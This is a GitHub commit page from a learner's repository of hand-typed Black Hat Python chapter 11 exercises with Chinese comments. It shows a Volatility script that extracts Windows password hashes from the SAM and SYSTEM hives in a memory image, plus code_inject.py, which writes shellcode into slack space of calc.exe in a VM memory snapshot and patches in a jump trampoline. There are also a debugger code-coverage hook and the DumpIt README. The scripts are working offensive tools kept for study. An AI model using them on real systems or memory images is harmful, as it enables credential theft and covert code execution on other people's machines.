Skip to content

Commit 9102359

Browse files
giantbranchgiantbranch
committed
I eventually finished the book,I'm so happy.Thanks for the people who encourage me
1 parent 5dfedc5 commit 9102359

File tree

1,383 files changed

+583744
-0
lines changed

Some content is hidden

Large Commits have some content hidden by default. Use the searchbox below for content that may be hidden.

1,383 files changed

+583744
-0
lines changed

我手敲的代码(中文注释)/chapter11/DumpIt/DumpIt.exe

203 KB
Binary file not shown.

我手敲的代码(中文注释)/chapter11/DumpIt/README.txt

Lines changed: 14 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,14 @@
1+
- MoonSols Windows Memory "DumpIt" v1.3.2.20110401 -
2+
3+
Copyright (C) 2010 - 2011, Matthieu Suiche <http://www.msuiche.net>
4+
Copyright (C) 2010 - 2011, MoonSols <http://www.moonsols.com>
5+
6+
All executables and drivers are NOT redistributable, and licence applies only to one single
7+
user. Reverse engineering is prohibited.
8+
9+
You are experiencing any problems contact us at : support@moonsols.com
10+
11+
12+
This utility is used to generate a physical memory dump of Windows machines. It works with both x86 (32-bits) and x64 (64-bits) machines.
13+
The raw memory dump is generated in the current directory, only a confirmation question is prompted before starting.
14+
Perfect to deploy the executable on USB keys, for quick incident responses needs.

我手敲的代码(中文注释)/chapter11/cmeasure.bin

138 Bytes
Binary file not shown.

我手敲的代码(中文注释)/chapter11/code_inject.py

Lines changed: 114 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,114 @@
1+
#-*- coding:utf8 -*-
2+
3+
"""
4+
@version:
5+
@author: giantbranch
6+
@file: code_inject.py
7+
@time: 2016/3/16 13:04
8+
"""
9+
10+
import sys
11+
import struct
12+
13+
equals_button = 0x01005D51
14+
15+
# 要分析的内存文件位置
16+
memory_file = "D:\\Windows XP Professional-f6b49762.vmem"
17+
slack_space = None
18+
trampoline_offset = None
19+
20+
# 读入我们的shellcode
21+
sc_fd = open("cmeasure.bin", "rb")
22+
sc = sc_fd.read()
23+
sc_fd.close()
24+
25+
sys.path.append("D:\\volatility-2.3")
26+
27+
import volatility.conf as conf
28+
import volatility.registry as registry
29+
30+
registry.PluginImporter()
31+
config = conf.ConfObject()
32+
33+
import volatility.commands as commands
34+
import volatility.addrspace as addrspace
35+
36+
registry.register_global_options(config, commands.Command)
37+
registry.register_global_options(config, addrspace.BaseAddressSpace)
38+
39+
config.parse_options()
40+
config.PROFILE = "WinXPSP3x86"
41+
config.LOCATION = "file://%s" % memory_file
42+
43+
import volatility.plugins.taskmods as taskmods
44+
45+
p = taskmods.PSList(config)
46+
for process in p.calculate():
47+
if str(process.ImageFileName) == "calc.exe":
48+
print "[*] Found calc.exe with PID %d" % process.UniqueProcessId
49+
print "[*] Hunting for physical offsets...please wait."
50+
51+
address_space = process.get_process_address_space()
52+
pages = address_space.get_available_pages()
53+
54+
# page[0]:页面地址
55+
# page[1]:页面大小
56+
for page in pages:
57+
physical = address_space.vtop(page[0])
58+
if physical is not None:
59+
fd = open(memory_file, "r+")
60+
fd.seek(physical)
61+
buf = fd.read(page[1])
62+
63+
try:
64+
offset = buf.index("\x00" * len(sc))
65+
slack_space = page[0] + offset
66+
67+
print "[*] Found good shellcode location!"
68+
print "[*] Virtual address: 0x%08x" % slack_space
69+
print "[*] Physical address: 0x%08x" % (physical + offset)
70+
print "[*] Injecting shellcode."
71+
72+
fd.seek(physical + offset)
73+
fd.write(sc)
74+
fd.flush()
75+
76+
# 创建我们的跳转代码
77+
# 对应的汇编指令为:
78+
# mov ebx, ADDRESS_OF_SHELLCODE( shellcode地址)
79+
# jmp ebx
80+
tramp = "\xbb%s" % struct.pack("<L", page[0] + offset)
81+
tramp += "\xff\xe3"
82+
83+
if trampoline_offset is not None:
84+
break
85+
86+
except:
87+
pass
88+
89+
fd.close()
90+
91+
# 查看目标代码的位置
92+
if page[0] <= equals_button and equals_button < (page[0] + page[1] -7):
93+
print "[*] Found our trampoline target at: 0x%08x" % (physical)
94+
# 计算虚拟偏移
95+
v_offset = equals_button - page[0]
96+
# 计算物理偏移
97+
trampoline_offset = physical+ v_offset
98+
99+
print "[*] Found our trampoline target at: 0x%08x" % (trampoline_offset)
100+
101+
if slack_space is not None:
102+
break
103+
104+
105+
print "[*] Writing trampoline..."
106+
107+
fd = open(memory_file, "r+")
108+
fd.seek(trampoline_offset)
109+
fd.write(tramp)
110+
fd.close()
111+
112+
print "[*] Done injecting code."
113+
114+

我手敲的代码(中文注释)/chapter11/codecoverage.py

Lines changed: 37 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,37 @@
1+
#-*- coding:utf8 -*-
2+
3+
"""
4+
@version:
5+
@author: giantbranch
6+
@file: codecoverage.py
7+
@time: 2016/3/15 23:15
8+
"""
9+
10+
from immlib import *
11+
12+
class cc_hook(LogBpHook):
13+
14+
def __init__(self):
15+
LogBpHook.__init__(self)
16+
self.imm = Debugger()
17+
18+
def run(self, regs):
19+
self.imm.log("%08x" % regs['EIP'], regs['EIP'])
20+
self.imm.deleteBreakpoint(regs['EIP'])
21+
return
22+
23+
24+
def main(args):
25+
26+
imm = Debugger()
27+
28+
calc = imm.getModule("calc.exe")
29+
imm.analyseCode(calc.getCodebase())
30+
31+
functions = imm.getAllFunctions(calc.getCodebase())
32+
33+
hooker = cc_hook()
34+
for function in functions:
35+
hooker.add("%08x" % function, function)
36+
37+
return "Tracking %d functions." % len(functions)

我手敲的代码(中文注释)/chapter11/grabhashes.py

Lines changed: 70 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,70 @@
1+
#-*- coding:utf8 -*-
2+
3+
"""
4+
@version:
5+
@author: giantbranch
6+
@file: grabhashes.py
7+
@time: 2016/3/15 20:16
8+
"""
9+
10+
import sys
11+
import struct
12+
import volatility.conf as conf
13+
import volatility.registry as registry
14+
15+
# 要分析的内存文件位置
16+
memory_file = "D:\\Windows XP Professional-f6b49762.vmem"
17+
18+
# volatility的下载的路径
19+
sys.path.append("D:\\volatility-2.3")
20+
21+
registry.PluginImporter()
22+
config = conf.ConfObject()
23+
24+
import volatility.commands as commands
25+
import volatility.addrspace as addrspace
26+
27+
config.parse_options()
28+
config.PROFILE = "WinXPSP3x86"
29+
config.LOCATION = "file://%s" % memory_file
30+
31+
# 注册全局参数
32+
registry.register_global_options(config, commands.Command)
33+
registry.register_global_options(config, addrspace.BaseAddressSpace)
34+
35+
from volatility.plugins.registry.registryapi import RegistryApi
36+
from volatility.plugins.registry.lsadump import HashDump
37+
38+
# 实例化一个RegistryApi类对象(包含常用的注册表帮助类)
39+
registry = RegistryApi(config)
40+
# 等同与hivelist命令
41+
registry.populate_offsets()
42+
43+
sam_offset = None
44+
sys_offset = None
45+
46+
# 循环检索SAM和system键值
47+
for offset in registry.all_offsets:
48+
if registry.all_offsets[offset].endswith("\\SAM"):
49+
sam_offset = offset
50+
print "[*] SAM: 0x%08x" % offset
51+
52+
if registry.all_offsets[offset].endswith("\\system"):
53+
sys_offset = offset
54+
print "[*] System: 0x%08x" % offset
55+
56+
if sam_offset is not None and sys_offset is not None:
57+
config.sys_offset = sys_offset
58+
config.sam_offset = sam_offset
59+
60+
# 创建HashDump对象
61+
hashdump = HashDump(config)
62+
63+
for hash in hashdump.calculate():
64+
print hash
65+
66+
break
67+
68+
69+
if sam_offset is None or sys_offset is None:
70+
print "[*] Failed to find the system or SAM offsets."

我手敲的代码(中文注释)/chapter11/immlib/__init__.py

Lines changed: 1 addition & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1 @@
1+
all = ["immutils"] #for now

我手敲的代码(中文注释)/chapter11/immlib/_bsddb.lib

1.85 KB
Binary file not shown.

我手敲的代码(中文注释)/chapter11/immlib/_ctypes.lib

1.68 KB
Binary file not shown.

我手敲的代码(中文注释)/chapter11/immlib/_ctypes_test.lib

18.8 KB
Binary file not shown.

0 commit comments

Comments
 (0)